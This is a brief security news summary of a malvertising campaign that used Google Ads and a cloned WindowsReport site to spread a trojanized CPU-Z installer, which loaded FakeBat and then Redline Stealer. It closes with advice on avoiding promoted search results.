November 9, 2023 at 11:15AM
A threat actor has been using Google Ads to distribute a trojanized version of the CPU-Z tool, delivering the Redline info-stealing malware. Malicious ads redirect victims to a cloned copy of a legitimate Windows news site, where they are prompted to download a digitally-signed CPU-Z installer. This installer contains a malicious PowerShell script that loads the FakeBat malware and fetches the Redline Stealer payload. Users should be cautious when clicking on promoted Google Search results and verify the legitimacy of websites before downloading software.
Summary:
During a recent meeting, it was discussed that a threat actor has been using Google Ads to distribute a trojanized version of the CPU-Z tool, which delivers the Redline info-stealing malware. Malwarebytes analysts have identified this campaign as part of the same operation that previously used Notepad++ malvertising. The malicious Google advertisement is hosted on a cloned copy of the legitimate Windows news site WindowsReport. Clicking the ad redirects users to a fake site, where they are prompted to download a digitally-signed CPU-Z installer. This installer contains a malicious PowerShell script known as “FakeBat” that fetches the Redline Stealer payload from a remote URL and launches it on the victim’s computer. Redline is capable of stealing passwords, cookies, browsing data, and sensitive information from cryptocurrency wallets. Users are advised to be cautious when clicking on promoted Google Search results and to verify that the loaded site and domain match or use an ad-blocker to automatically hide them.